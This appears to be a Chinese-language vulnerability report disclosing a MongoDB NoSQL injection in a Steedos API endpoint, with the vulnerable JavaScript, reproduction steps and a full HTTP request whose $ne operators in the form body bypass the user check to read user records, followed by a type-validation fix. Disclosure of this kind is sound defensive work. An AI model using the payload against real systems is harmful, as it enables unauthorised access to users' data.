Mongodb NoSQL 注入问题
Created by: lokeex
接口对mongodb nosql操作验证不严,可能导致nosql注入。详细可参考
https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf
大多数接口存在鉴权所以未登录无法利用,这里仅仅举一个例子
漏洞产生原因
例如在 server/packages/steedos_base.js 中,存在如下代码:
JsonRoutes.add("post", "/api/collection/findone", function (req, res, next) {
...
if (req.body) {
userId = req.body["X-User-Id"];
authToken = req.body["X-Auth-Token"];
}
...
model = req.body.model;
selector = req.body.selector;
options = req.body.options;
space = req.body.space;
...
space_user = db.space_users.findOne({
user: userId,
space: space
});
...req.body.*可以是一个object,利用$ne等mongodb的query operator https://docs.mongodb.com/manual/reference/operator/query/
构造 X-User-Id[$ne]=1 这样的参数,实际传入的参数就是 {user: {"$ne":"1"},...}
就可以查询任意的space_user并返回用户信息
复现流程
- 参考 https://www.steedos.com/help/deploy/deploy_docker 进行docker部署
- 创建账号
- 访问接口
POST /api/collection/findone HTTP/1.1
Host: <**>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: <**>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
X-Auth-Token=1&X-User-Id[$ne]=1&space[$ne]=1&model=space_users建议:应该在nosql操作前验证参数类型